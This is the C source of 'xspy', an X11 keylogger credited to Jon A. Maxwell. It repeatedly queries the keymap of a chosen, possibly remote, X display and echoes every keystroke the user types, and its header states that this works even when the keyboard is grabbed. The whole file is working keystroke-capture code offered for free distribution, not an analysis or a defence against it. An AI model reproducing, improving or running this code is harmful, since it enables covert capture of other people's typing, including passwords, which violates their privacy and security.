                                     /*
                                    xspy
                             Jon A. Maxwell (JAM)
              Monitors keystrokes even the keyboard is grabbed.
                                     */


/* Synopsis:
	xspy polls the keyboard to determine the state of all keys on
	the keyboard.  By comparing results it determines which key has
	been pressed and what modifiers are in use.  In this way it
	echos to the user all keystrokes typed.
   Distribution:
   	xspy is freely distributable, provided the source remains intact.
   	(if you want something changed, mail me at: jmaxwell@acm.vt.edu)
*/

#include <X11/Xlib.h>
#include <X11/X.h>

#include <string.h>
#include <stdio.h>

#include "xspy.h"

Display	*disp;
int	PrintUp  =FALSE;

int usage() {
	printf("%s\n%s\n%s\n%s\n%s%s%s\n",
		"USAGE: xspy -display <display> -delay <usecs> -up",
		"       Options: display, specifies an X display.",
		"                delay, determines the polling frequency (.1 sec is 100000 usecs)",
		"                up, gives up transitions for some keys.",
		"       Version ",VERSION, ", by JAM");
	exit(0);
	}

                                                                                        

int main(int argc, char *argv[]) {
	char	*hostname=DEFAULT_DISPLAY,
		*char_ptr,
		buf1[32],	buf2[32],
		*keys,		*saved;
	int	i,	delay=DEFAULT_DELAY;

	/* get args */
	for (i=1; i<argc; i++) {
		     if (!strcmp(argv[i], "-help")) usage();
		else if (!strcmp(argv[i], "-display")) {
			i++;
			hostname=argv[i];
			}
		else if (!strcmp(argv[i], "-delay")) {
			i++;
			delay=atoi(argv[i]);
			}
		else if (!strcmp(argv[i], "-up"))   {PrintUp  =TRUE;}
		else usage();
		}
	
	/* setup Xwindows */
	disp=XOpenDisplay(hostname);
	if (NULL==disp) {
		fprintf(stderr, "Cannot open X display: %s\n", hostname);
		exit(1);
		}
	XSynchronize(disp, TRUE);

	/* setup buffers */
	saved=buf1; keys=buf2;
	XQueryKeymap(disp, saved);
	
	while (1) {
		/* find changed keys */
		XQueryKeymap(disp, keys);
		for (i=0; i<32*8; i++) {
			if (BIT(keys, i)!=BIT(saved, i)) {
				register char *str;
				str=(char *)KeyCodeToStr(i, BIT(keys, i), KeyModifiers(keys));
				if (BIT(keys, i)!=0 || PrintUp) printf("%s",str);
				fflush(stdout);	/* in case user is writing to a pipe */
				}
			}
		
		/* swap buffers */
		char_ptr=saved;
		saved=keys;
		keys=char_ptr;
		
		usleep(delay);
		}
	}


